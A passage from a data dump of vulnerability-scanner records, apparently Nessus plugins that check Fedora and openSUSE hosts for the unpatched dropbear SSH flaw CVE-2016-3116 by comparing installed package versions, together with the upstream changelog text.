Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179261.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0be1420\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"dropbear-2016.72-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:11", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-24T00:00:00", "title": "Fedora 22 : dropbear-2016.72-1.fc22 (2016-40a657cee1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-40A657CEE1.NASL", "href": "https://www.tenable.com/plugins/nessus/90132", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-40a657cee1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90132);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-40a657cee1\");\n\n script_name(english:\"Fedora 22 : dropbear-2016.72-1.fc22 (2016-40a657cee1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39f9a2e2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"dropbear-2016.72-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:44", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-28T00:00:00", "title": "Fedora 24 : dropbear-2016.72-1.fc24 (2016-bc45faa824)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-28T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:24", "p-cpe:/a:fedoraproject:fedora:dropbear"], "id": "FEDORA_2016-BC45FAA824.NASL", "href": "https://www.tenable.com/plugins/nessus/90225", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-bc45faa824.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90225);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-bc45faa824\");\n\n script_name(english:\"Fedora 24 : dropbear-2016.72-1.fc24 (2016-bc45faa824)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179870.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17246541\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"dropbear-2016.72-1.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:30:12", "description": "dropbear was updated to 2016.72 to fix the following issues :\n\nChanges in dropbear :\n\n - updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. 
Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if 
available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - fixed checksum URL\n\n - updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. 
AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - replaced deprecated gpg-offline check by\n obs-service-source_validator\n\n - updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie", "edition": 19, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-25T00:00:00", "title": "openSUSE Security Update : dropbear (openSUSE-2016-387)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dropbear-debugsource", "p-cpe:/a:novell:opensuse:dropbear", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:dropbear-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-387.NASL", "href": "https://www.tenable.com/plugins/nessus/90165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-387.\n#\n# The text description of this plugin is (C) SUSE 
LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90165);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"openSUSE Security Update : dropbear (openSUSE-2016-387)\");\n script_summary(english:\"Check for the openSUSE-2016-387 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"dropbear was updated to 2016.72 to fix the following issues :\n\nChanges in dropbear :\n\n - updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern 
webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. 
Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - fixed checksum URL\n\n - updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. 
From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - replaced deprecated gpg-offline check by\n obs-service-source_validator\n\n - updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/robotframework/SSHLibrary/issues/128\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-debuginfo-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-debugsource-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-2016.72-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-debuginfo-2016.72-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-debugsource-2016.72-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear / dropbear-debuginfo / dropbear-debugsource\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:30:12", "description": "This update for dropbear fixes the following issues :\n\n - dropbear was updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - dropbear was updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - dropbear was updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n 